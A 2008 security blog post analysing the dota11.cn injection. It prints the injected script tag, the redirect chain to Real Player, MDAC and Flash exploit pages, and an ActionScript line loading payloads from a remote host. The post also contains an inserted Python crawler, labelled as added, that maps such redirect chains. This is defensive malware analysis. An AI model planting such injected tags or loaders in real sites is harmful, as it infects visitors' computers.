Updated Date: 09-mar-2008
Creation Date: 07-mar-2006
Expiration Date: 07-mar-2009

As always if you have any questions or comments feel free to contact me or leave them here.

Posted in Malicious Domain | 1 Comment »

Malicious Site Analysis for dota11.cn injection

Posted by jeremy on May 27th, 2008

SQL and XSS site injections have become a standard for spreading malicious code and binaries lately. This is my analysis of the dota11.cn injection that just recently occurred. My goal in doing this analysis is to provide a visual picture into how these types of injections work and the methodologies behind them. First off here is a Site Map for the current mappings of the dota11.cn injection:

As you can see from the Site Map these types of injections serve as the gateways to a much larger schema of user tracking, malicious code, and exploit serving web pages and/or scripts. Now let me attempt to walk you through the logic for this schema.

hxxp://www.dota11.cn/m.js

This is the entry page for this injection. The following is the actual code injected into a vulnerable web site:

<script src=hxxp://www.dota11.cn/m.js>

A simple script src= will automatically include the malicious code from the above URL, which is why it is injected into the vulnerable web site in the first place. The m.js file contains a simple JavaScript that is used to non-intrusively redirect you to a statistics gathering server. This will allow the malicious designer of this schema to track users, system configurations, and traffic flows as you are involuntarily redirected through this maze of hostile content. The statistical gathering server is located here: web.51.la/go.asp. The other portion of the m.js file contains simple logic to render one of two iframe redirections based off your browser's language settings. If you have the Chinese language pack configured you will be directed to: windows.loveyoushipin.com/ing/le.htm, and if you don't have it configured you will be directed to: www.dota11.cn/dj.htm. The last and final portion of the m.js script will direct you via an iframe to: www.woai117.cn/123.htm. You can view the original m.js source code here in PDF format: M.js Source Code.

hxxp://windows.loveyoushipin.com/ing/le.htm

You will only receive this iframe redirection if your browser is configured to use the Chinese language pack. The le.htm file will attempt to serve a Real Player exploit (CVE-2007-5601) to you; more information on this vulnerability can be found here: Vulnerability Summary CVE-2007-5601. The other portion of this script will covertly redirect you to a short JavaScript at hxxp://js.users.51.la/1662569.js, which is the configuration gathering script that will submit your information to the statistics gathering web server: vip2.51.la/go.asp. Strategically placing these statistics gathering scripts allows the malicious site designer to track their logic flows and exploit attempts to gauge how successful his or her design is. You can view the original le.htm and 1662569.js source code here in PDF format: 1662569_js Source Code and le_htm Source Code.

hxxp://www.dota11.cn/dj.htm

You will receive this iframe redirection if your browser is not configured to use the Chinese language pack. This file appears to be the most complex piece of this malicious schema, with several logically chosen exploits being served up, and it is obfuscated to prevent detection and deter analysis. The first attempt at serving up malicious content is targeted at an old vulnerability in the Microsoft Data Access Components (MDAC) Function (MS06-014). If your configuration doesn't throw an error on the creation of the Adobe.Stream object you will be iframe redirected to hxxp://www.dota11.cn/14.htm, where the malicious binary bak.exe will be downloaded to your computer from hxxp://www.woai117.cn/bak.exe via the MDAC vulnerability being exploited. If your configuration throws an error, a Real Player vulnerability will be probed for. Here is the vulnerability summary information: CVE-2007-5601; it is the same vulnerability that was seen in the le.htm file earlier. If this probe does not throw an error you will be redirected to hxxp://www.dota11.cn/rl.htm, where an attempt will be made to exploit this vulnerability. If the above Real Player vulnerability probe fails and throws an error you will be iframe redirected to hxxp://www.dota11.cn/new.htm, where you will receive another attempt at exploiting a more recent Real Player vulnerability (CVE-2008-1309). You will also be redirected to hxxp://www.dota11.cn/04.htm, which looks like a leftover iframe reference that the designer forgot to clean up. I say this because I received a 404 error when I tried grabbing this file. The last iframe redirection occurs no matter what the above logic dictated and will lead you to hxxp://www.dota11.cn/123.htm. Here is the source code for the files mentioned in this paragraph: dj_htm Source Code, 14_htm Source Code, rl_htm Source Code, and new_htm Source Code. The decoded version of dj.htm can be seen here: dj_htm_decoded Source Code. VirusTotal bak.exe Results.

hxxp://www.dota11.cn/123.htm and hxxp://www.woai117.cn/123.htm

These two files, although hosted on separate domains, contain the exact same content. Both of these are serving up malicious Flash Media files. If you're using Internet Explorer you will receive this video: hxxp://www.woai117.cn/4561.swf, and for all others you will receive this video: hxxp://www.woai117.cn/4562.swf. Both of these utilize some embedded ActionScript logic to redirect you to a malicious Flash Media file based on your Flash Media Player version. For Internet Explorer users the redirect looks like this: hxxp://www.woai117.cn/ + fVersion + i.swf, and for all others it looks like this: hxxp://www.woai117.cn/ + fVersion + f.swf. The following excerpt is from the ActionScript being used:

movie '4561.swf' {
    // flash 8, total frames: 1, frame rate: 12 fps, 550x400 px, compressed
    frame 1 {
        var fVersion = /:$version;
        loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);
        stop();
    }
}
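To reproduce the kind of Site Map shown at the top of this post, here is an added example (my own code, not anything from the injection or the original post) that crawls each file in a chain like the one above, pulling out script/iframe/embed src targets and the version-dependent loadMovie hop from the ActionScript. The file contents in SAMPLES are constructed stand-ins that mirror the description, defanged with hxxp:// as in the post; 04.htm is deliberately left out to reproduce the 404 the author reports.

```python
"""Added example, not code from the original post: reconstruct the redirect
chain (the post's "Site Map") of an injection like the dota11.cn one by
crawling each fetched file for script/iframe/embed src and loadMovie targets."""
import re
from collections import deque

URL = r"""["']?(hxxps?://[^\s"'>]+)"""
PATTERNS = [
    # injected <script src=...>, hidden <iframe src=...>, <embed src=...swf>
    re.compile(r"<(?:script|iframe|embed)[^>]*\ssrc=" + URL, re.I),
    # ActionScript loadMovie('base' + fVersion + 'suffix'): version-dependent hop
    re.compile(r"loadMovie\(\s*'(hxxp://[^']*)'\s*\+\s*\w+\s*\+\s*'([^']*)'"),
]

D, W = "hxxp://www.dota11.cn/", "hxxp://www.woai117.cn/"
SAMPLES = {  # constructed stand-ins for the captured files, defanged as in the post
    "hxxp://victim.example/page.html": "<p>Hi</p><script src=" + D + "m.js></script>",
    D + "m.js": "document.write('<script src=\"hxxp://web.51.la/go.asp\"></script>');"
                "if (lang == 'zh-cn') document.write('<iframe src=\"hxxp://windows.loveyoushipin.com/ing/le.htm\" height=0></iframe>');"
                "else document.write('<iframe src=\"" + D + "dj.htm\" height=0></iframe>');"
                "document.write('<iframe src=\"" + W + "123.htm\" height=0></iframe>');",
    "hxxp://windows.loveyoushipin.com/ing/le.htm": "<script src=hxxp://js.users.51.la/1662569.js></script>",
    D + "dj.htm": "<iframe src=" + D + "14.htm></iframe><iframe src=" + D + "04.htm></iframe>",
    W + "123.htm": "<embed src='" + W + "4561.swf'>",
    W + "4561.swf": "loadMovie('" + W + "' + fVersion + 'i.swf', _root);",
    # leaf files with no further hops; 04.htm is deliberately absent (the 404 the post saw)
    **{u: "" for u in ("hxxp://web.51.la/go.asp", "hxxp://js.users.51.la/1662569.js", D + "14.htm")},
}

def map_chain(entry, fetch):
    """BFS from entry. Returns (edges, dead): edges[url] lists the next hops
    found in that file in source order; dead lists hops whose fetch returned None."""
    edges, dead, seen, queue = {}, [], {entry}, deque([entry])
    while queue:
        url = queue.popleft()
        body = fetch(url)
        if body is None:
            dead.append(url)
            continue
        hops = []
        for pat in PATTERNS:
            for m in pat.finditer(body):
                hops.append(m.group(1) if pat.groups == 1 else m.group(1) + "{fVersion}" + m.group(2))
        edges[url] = hops
        for h in hops:  # a version-templated name cannot be fetched literally, so it stays a leaf
            if h not in seen and "{fVersion}" not in h:
                seen.add(h)
                queue.append(h)
    return edges, dead
```

Calling `map_chain("hxxp://victim.example/page.html", SAMPLES.get)` yields the edge list for the whole chain plus the dead 04.htm link; pointing `fetch` at a real retriever (run from an isolated analysis box) gives the same map for a live capture.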

This looks like the same vulnerabilities SANS.org is referencing in Adobe Flash Player Vuln and Malicious swf files.

If you have any questions or comments regarding this posting as always feel free to contact me. I hope you enjoyed the change from the normal Storm Worm coverage. Thanks for visiting.

Posted in Malicious Domain | 1 Comment »